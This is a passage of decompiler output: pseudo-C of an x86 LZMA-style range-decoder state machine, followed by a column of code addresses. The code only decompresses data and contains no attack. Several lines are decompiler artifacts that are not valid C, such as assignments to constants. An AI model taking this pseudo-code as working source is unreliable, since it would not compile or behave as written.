                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xd;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t122 = __ebp - 0x70;
                                                                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t122;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												L39:
                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      													goto L48;
                                                                                      												}
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													goto L54;
                                                                                      												}
                                                                                      												L41:
                                                                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      												 *(__ebp - 0x48) = __eax;
                                                                                      												__eax = __eax + 1;
                                                                                      												__eax = __eax << 8;
                                                                                      												__eax = __eax + __ebx;
                                                                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edx = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													 *(__ebp - 0x40) = 1;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													__ebx = __ebx + __ebx + 1;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edx;
                                                                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													goto L39;
                                                                                      												} else {
                                                                                      													goto L37;
                                                                                      												}
                                                                                      											case 0xe:
                                                                                      												L46:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xe;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t156 = __ebp - 0x70;
                                                                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t156;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												while(1) {
                                                                                      													L48:
                                                                                      													__eflags = __ebx - 0x100;
                                                                                      													if(__ebx >= 0x100) {
                                                                                      														break;
                                                                                      													}
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													__edx = __ebx + __ebx;
                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                      													__esi = __edx + __eax;
                                                                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      													__ax =  *__esi;
                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                      													__edi = __ax & 0x0000ffff;
                                                                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      													if( *(__ebp - 0xc) >= __ecx) {
                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      														__cx = __ax;
                                                                                      														_t170 = __edx + 1; // 0x1
                                                                                      														__ebx = _t170;
                                                                                      														__cx = __ax >> 5;
                                                                                      														__eflags = __eax;
                                                                                      														 *__esi = __ax;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x10) = __ecx;
                                                                                      														0x800 = 0x800 - __edi;
                                                                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      														__ebx = __ebx + __ebx;
                                                                                      														 *__esi = __cx;
                                                                                      													}
                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      														continue;
                                                                                      													} else {
                                                                                      														goto L46;
                                                                                      													}
                                                                                      												}
                                                                                      												L54:
                                                                                      												_t173 = __ebp - 0x34;
                                                                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      												__eflags =  *_t173;
                                                                                      												goto L55;
                                                                                      											case 0xf:
                                                                                      												L58:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xf;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t203 = __ebp - 0x70;
                                                                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t203;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												L60:
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													L55:
                                                                                      													__al =  *(__ebp - 0x44);
                                                                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      													goto L56;
                                                                                      												}
                                                                                      												L61:
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__edx = __ebx + __ebx;
                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                      												__esi = __edx + __eax;
                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													_t217 = __edx + 1; // 0x1
                                                                                      													__ebx = _t217;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edi;
                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													goto L60;
                                                                                      												} else {
                                                                                      													goto L58;
                                                                                      												}
                                                                                      											case 0x10:
                                                                                      												L109:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0x10;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t365 = __ebp - 0x70;
                                                                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t365;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												goto L111;
                                                                                      											case 0x11:
                                                                                      												L68:
                                                                                      												_t614 =  *(_t621 - 0x58);
                                                                                      												 *(_t621 - 0x84) = 0x12;
                                                                                      												while(1) {
                                                                                      													L132:
                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											case 0x12:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													 *(__ebp - 0x84) = 0x13;
                                                                                      													__esi =  *(__ebp - 0x58) + 2;
                                                                                      													while(1) {
                                                                                      														L132:
                                                                                      														 *(_t621 - 0x54) = _t614;
                                                                                      														goto L133;
                                                                                      													}
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                      												__eflags = __eax;
                                                                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      												goto L130;
                                                                                      											case 0x13:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													_t469 = __ebp - 0x58;
                                                                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      													__eflags =  *_t469;
                                                                                      													 *(__ebp - 0x30) = 0x10;
                                                                                      													 *(__ebp - 0x40) = 8;
                                                                                      													L144:
                                                                                      													 *(__ebp - 0x7c) = 0x14;
                                                                                      													goto L145;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                      												 *(__ebp - 0x30) = 8;
                                                                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      												L130:
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												 *(__ebp - 0x40) = 3;
                                                                                      												goto L144;
                                                                                      											case 0x14:
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      												__eax =  *(__ebp - 0x80);
                                                                                      												 *(_t621 - 0x88) = _t542;
                                                                                      												goto L1;
                                                                                      											case 0x15:
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      												__al = __al & 0x000000fd;
                                                                                      												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      												goto L120;
                                                                                      											case 0x16:
                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                      												__eflags = __eax - 4;
                                                                                      												if(__eax >= 4) {
                                                                                      													_push(3);
                                                                                      													_pop(__eax);
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 4);
                                                                                      												 *(__ebp - 0x40) = 6;
                                                                                      												__eax = __eax << 7;
                                                                                      												 *(__ebp - 0x7c) = 0x19;
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												goto L145;
                                                                                      											case 0x17:
                                                                                      												L145:
                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                      												 *(__ebp - 0x50) = 1;
                                                                                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                      												goto L149;
                                                                                      											case 0x18:
                                                                                      												L146:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0x18;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t484 = __ebp - 0x70;
                                                                                      												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t484;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												L148:
                                                                                      												_t487 = __ebp - 0x48;
                                                                                      												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                      												__eflags =  *_t487;
                                                                                      												L149:
                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                      													__ecx =  *(__ebp - 0x40);
                                                                                      													__ebx =  *(__ebp - 0x50);
                                                                                      													0 = 1;
                                                                                      													__eax = 1 << __cl;
                                                                                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                      													__eax =  *(__ebp - 0x7c);
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      													while(1) {
                                                                                      														 *(_t621 - 0x88) = _t542;
                                                                                      														goto L1;
                                                                                      													}
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x50);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__esi = __edx + __eax;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__ax =  *__esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eax = __eax - __ecx;
                                                                                      													__edx = __edx + 1;
                                                                                      													__eflags = __edx;
                                                                                      													 *__esi = __ax;
                                                                                      													 *(__ebp - 0x50) = __edx;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edi;
                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													goto L148;
                                                                                      												} else {
                                                                                      													goto L146;
                                                                                      												}
                                                                                      											case 0x19:
                                                                                      												__eflags = __ebx - 4;
                                                                                      												if(__ebx < 4) {
                                                                                      													 *(__ebp - 0x2c) = __ebx;
                                                                                      													L119:
                                                                                      													_t393 = __ebp - 0x2c;
                                                                                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                      													__eflags =  *_t393;
                                                                                      													L120:
                                                                                      													__eax =  *(__ebp - 0x2c);
                                                                                      													__eflags = __eax;
                                                                                      													if(__eax == 0) {
                                                                                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                      														goto L170;
                                                                                      													}
                                                                                      													__eflags = __eax -  *(__ebp - 0x60);
                                                                                      													if(__eax >  *(__ebp - 0x60)) {
                                                                                      														goto L171;
                                                                                      													}
                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                      													__eax =  *(__ebp - 0x30);
                                                                                      													_t400 = __ebp - 0x60;
                                                                                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                      													__eflags =  *_t400;
                                                                                      													goto L123;
                                                                                      												}
                                                                                      												__ecx = __ebx;
                                                                                      												__eax = __ebx;
                                                                                      												__ecx = __ebx >> 1;
                                                                                      												__eax = __ebx & 0x00000001;
                                                                                      												__ecx = (__ebx >> 1) - 1;
                                                                                      												__al = __al | 0x00000002;
                                                                                      												__eax = (__ebx & 0x00000001) << __cl;
                                                                                      												__eflags = __ebx - 0xe;
                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                      												if(__ebx >= 0xe) {
                                                                                      													__ebx = 0;
                                                                                      													 *(__ebp - 0x48) = __ecx;
                                                                                      													L102:
                                                                                      													__eflags =  *(__ebp - 0x48);
                                                                                      													if( *(__ebp - 0x48) <= 0) {
                                                                                      														__eax = __eax + __ebx;
                                                                                      														 *(__ebp - 0x40) = 4;
                                                                                      														 *(__ebp - 0x2c) = __eax;
                                                                                      														__eax =  *(__ebp - 4);
                                                                                      														__eax =  *(__ebp - 4) + 0x644;
                                                                                      														__eflags = __eax;
                                                                                      														L108:
                                                                                      														__ebx = 0;
                                                                                      														 *(__ebp - 0x58) = __eax;
                                                                                      														 *(__ebp - 0x50) = 1;
                                                                                      														 *(__ebp - 0x44) = 0;
                                                                                      														 *(__ebp - 0x48) = 0;
                                                                                      														L112:
                                                                                      														__eax =  *(__ebp - 0x40);
                                                                                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                      															_t391 = __ebp - 0x2c;
                                                                                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                      															__eflags =  *_t391;
                                                                                      															goto L119;
                                                                                      														}
                                                                                      														__eax =  *(__ebp - 0x50);
                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      														__eax =  *(__ebp - 0x58);
                                                                                      														__esi = __edi + __eax;
                                                                                      														 *(__ebp - 0x54) = __esi;
                                                                                      														__ax =  *__esi;
                                                                                      														__ecx = __ax & 0x0000ffff;
                                                                                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                      														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                      														if( *(__ebp - 0xc) >= __edx) {
                                                                                      															__ecx = 0;
                                                                                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                      															__ecx = 1;
                                                                                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                      															__ebx = 1;
                                                                                      															__ecx =  *(__ebp - 0x48);
                                                                                      															__ebx = 1 << __cl;
                                                                                      															__ecx = 1 << __cl;
                                                                                      															__ebx =  *(__ebp - 0x44);
                                                                                      															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                      															__cx = __ax;
                                                                                      															__cx = __ax >> 5;
                                                                                      															__eax = __eax - __ecx;
                                                                                      															__edi = __edi + 1;
                                                                                      															__eflags = __edi;
                                                                                      															 *(__ebp - 0x44) = __ebx;
                                                                                      															 *__esi = __ax;
                                                                                      															 *(__ebp - 0x50) = __edi;
                                                                                      														} else {
                                                                                      															 *(__ebp - 0x10) = __edx;
                                                                                      															0x800 = 0x800 - __ecx;
                                                                                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      															 *__esi = __dx;
                                                                                      														}
                                                                                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      															L111:
                                                                                      															_t368 = __ebp - 0x48;
                                                                                      															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                      															__eflags =  *_t368;
                                                                                      															goto L112;
                                                                                      														} else {
                                                                                      															goto L109;
                                                                                      														}
                                                                                      													}
                                                                                      													__ecx =  *(__ebp - 0xc);
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                      														__ecx =  *(__ebp - 0x10);
                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      														__ebx = __ebx | 0x00000001;
                                                                                      														__eflags = __ebx;
                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                      													}
                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      														L101:
                                                                                      														_t338 = __ebp - 0x48;
                                                                                      														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                      														__eflags =  *_t338;
                                                                                      														goto L102;
                                                                                      													} else {
                                                                                      														goto L99;
                                                                                      													}
                                                                                      												}
                                                                                      												__edx =  *(__ebp - 4);
                                                                                      												__eax = __eax - __ebx;
                                                                                      												 *(__ebp - 0x40) = __ecx;
                                                                                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                      												goto L108;
                                                                                      											case 0x1a:
                                                                                      												L56:
                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0x1a;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x68);
                                                                                      												__al =  *(__ebp - 0x5c);
                                                                                      												__edx =  *(__ebp - 8);
                                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      												 *( *(__ebp - 0x68)) = __al;
                                                                                      												__ecx =  *(__ebp - 0x14);
                                                                                      												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                      												__eax = __ecx + 1;
                                                                                      												__edx = 0;
                                                                                      												_t192 = __eax %  *(__ebp - 0x74);
                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                      												__edx = _t192;
                                                                                      												goto L79;
                                                                                      											case 0x1b:
                                                                                      												L75:
                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0x1b;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__edx =  *(__ebp - 8);
                                                                                      												__cl =  *(__eax + __edx);
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                                      												 *(__eax + __edx) = __cl;
                                                                                      												__eax = __eax + 1;
                                                                                      												__edx = 0;
                                                                                      												_t274 = __eax %  *(__ebp - 0x74);
                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                      												__edx = _t274;
                                                                                      												__eax =  *(__ebp - 0x68);
                                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      												_t283 = __ebp - 0x64;
                                                                                      												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                      												__eflags =  *_t283;
                                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                                      												L79:
                                                                                      												 *(__ebp - 0x14) = __edx;
                                                                                      												goto L80;
                                                                                      											case 0x1c:
                                                                                      												while(1) {
                                                                                      													L123:
                                                                                      													__eflags =  *(__ebp - 0x64);
                                                                                      													if( *(__ebp - 0x64) == 0) {
                                                                                      														break;
                                                                                      													}
                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                      														__eflags = __eax;
                                                                                      													}
                                                                                      													__edx =  *(__ebp - 8);
                                                                                      													__cl =  *(__eax + __edx);
                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                      													 *(__ebp - 0x5c) = __cl;
                                                                                      													 *(__eax + __edx) = __cl;
                                                                                      													__eax = __eax + 1;
                                                                                      													__edx = 0;
                                                                                      													_t414 = __eax %  *(__ebp - 0x74);
                                                                                      													__eax = __eax /  *(__ebp - 0x74);
                                                                                      													__edx = _t414;
                                                                                      													__eax =  *(__ebp - 0x68);
                                                                                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                      													__eflags =  *(__ebp - 0x30);
                                                                                      													 *( *(__ebp - 0x68)) = __cl;
                                                                                      													 *(__ebp - 0x14) = _t414;
                                                                                      													if( *(__ebp - 0x30) > 0) {
                                                                                      														continue;
                                                                                      													} else {
                                                                                      														L80:
                                                                                      														 *(__ebp - 0x88) = 2;
                                                                                      														goto L1;
                                                                                      													}
                                                                                      												}
                                                                                      												 *(__ebp - 0x88) = 0x1c;
                                                                                      												goto L170;
                                                                                      										}
                                                                                      									}
                                                                                      									L171:
                                                                                      									_t544 = _t543 | 0xffffffff;
                                                                                      									goto L172;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					goto L1;
                                                                                      				}
                                                                                      			}














                                                                                      0x00000000
                                                                                      0x00406efa
                                                                                      0x00406efa
                                                                                      0x00406efe
                                                                                      0x00406f1f
                                                                                      0x00406f26
                                                                                      0x00406f2c
                                                                                      0x00406f32
                                                                                      0x00406f44
                                                                                      0x00406f4a
                                                                                      0x00406f4f
                                                                                      0x00000000
                                                                                      0x00406f00
                                                                                      0x00406f06
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x004072ca
                                                                                      0x004072ca
                                                                                      0x004072ca
                                                                                      0x004072d0
                                                                                      0x004072d6
                                                                                      0x004072dc
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072ff
                                                                                      0x0040730a
                                                                                      0x0040730c
                                                                                      0x004072de
                                                                                      0x004072de
                                                                                      0x004072ed
                                                                                      0x004072f1
                                                                                      0x004072f1
                                                                                      0x00407316
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407318
                                                                                      0x0040731c
                                                                                      0x004074cb
                                                                                      0x004074e1
                                                                                      0x004074e9
                                                                                      0x004074f0
                                                                                      0x004074f2
                                                                                      0x004074f9
                                                                                      0x004074fd
                                                                                      0x004074fd
                                                                                      0x00407328
                                                                                      0x0040732f
                                                                                      0x00407337
                                                                                      0x0040733a
                                                                                      0x0040733d
                                                                                      0x0040733d
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00406adf
                                                                                      0x00406adf
                                                                                      0x00406adf
                                                                                      0x00406ae8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406aee
